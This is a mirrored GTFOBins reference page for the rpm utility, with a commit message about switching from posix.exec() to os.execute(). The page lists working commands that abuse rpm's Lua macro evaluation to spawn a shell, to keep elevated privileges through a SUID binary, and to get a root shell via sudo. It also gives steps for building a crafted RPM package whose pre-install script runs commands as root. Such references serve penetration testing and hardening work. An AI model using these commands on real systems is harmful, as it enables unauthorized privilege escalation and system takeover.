mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-27 07:18:48 +01:00
3bd955e8cc
From rpm versions 4.9.0 and on, posix.exec() will return an error unless called from a child process created with posix.fork(). os.execute() may be used instead. This change is documented in these two resources: - http://rpm.org/user_doc/lua.html - https://rpm-packaging-guide.github.io/ Close #53.
19 lines
593 B
Markdown
19 lines
593 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: rpm --eval '%{lua:os.execute("/bin/sh")}'
|
|
suid:
|
|
- code: ./rpm --eval '%{lua:os.execute("/bin/sh", "-p")}'
|
|
sudo:
|
|
- code: sudo rpm --eval '%{lua:os.execute("/bin/sh")}'
|
|
- description: |
|
|
It runs commands using a specially crafted RPM package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.
|
|
```
|
|
TF=$(mktemp -d)
|
|
echo 'id' > $TF/x.sh
|
|
fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF
|
|
```
|
|
code: |
|
|
sudo rpm -ivh x-1.0-1.noarch.rpm
|
|
---
|